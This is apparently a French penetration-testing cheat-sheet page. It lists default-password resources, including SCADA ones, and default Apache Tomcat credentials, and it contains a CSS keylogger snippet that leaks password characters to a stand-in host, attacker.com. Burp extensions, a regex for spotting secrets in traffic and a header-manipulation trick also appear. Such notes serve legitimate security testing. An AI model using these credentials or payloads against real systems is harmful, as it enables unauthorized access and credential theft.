Autre

Mots de passe par défaut

https://github.com/ihebski/DefaultCreds-cheat-sheet
https://www.routerpasswords.com/
https://cirt.net/passwords
https://default-password.info/
http://defaultpassword.us/
http://www.passwordsdatabase.com/
http://open-sez.me/
https://www.cleancss.com/router-default/
https://many-passwords.github.io/
#SCADA default passwords
https://www.hackers-arise.com/post/2016/09/21/Scada-Hacking-Default-Passwords-for-Nearly-Every-SCADA-System

Cheat-sheet

https://github.com/ihebski/DefaultCreds-cheat-sheet

Apache Tomcat

admin : admin
ADMIN : ADMIN
admin : j5Brn9
admin : None
admin : tomcat
cxsdk : kdsxc
j2deployer : j2deployer
ovwebusr : OvW*busr1
QCC : QLogic66
role : changethis
role1 : role1
role1 : tomcat
root : root
tomcat : changethis
tomcat : s3cret
tomcat : tomcat
xampp : xampp

CSS Keylogger

<style>
input[type="password"][value$="a"] {
  background-image: url("http://attacker.com/a");
}
</style>

Burp Extensions

Active Scan++
AutoRepeater
HTTP Request Smuggler
Backslash Powered Scanner
Collaborator Everywhere
Log4shell everywhere
JSON Beautifier
Sitemap Extractor
Param-miner
JSON WEB Tokens
Java Deserialization Scanner
Web Cache Deception Scanner
Autorize
BurpJSLinkFinder
JS Miner
BurpBounty
domain_hunter
Turbo Intruder
Server-side prototype pollution scanner
Upload Scanner
IP rotate
HUNT scanner
Software Vulneribility scanner
IIS Tilde
Graphquail
Content Type Converter
NoWAFpls
APIKit (de API-Security)
Distribute Damage
Auth Analyzer

Regex pour AutoRepeater

URL

https?://(www.)?[-a-zA-Z0–9@:%.+~#=]{1,256}.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%+.~#?&//=]*)

Regex pour filtrage des requêtes interessantes dans burp history

(?i)([a-z0-9]+){0,}((_|-){0,}(\\s){0,})(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)(\\s){0,}(=|:|is|>){1,}

Information disclosure

information disclosure à partir d'une manipulation d'en-tête:

Accept: application/json, text/javascript, */*, p=0.01

PrécédentCookie bomb SuivantFlask

Dernière mise à jour il y a 4 mois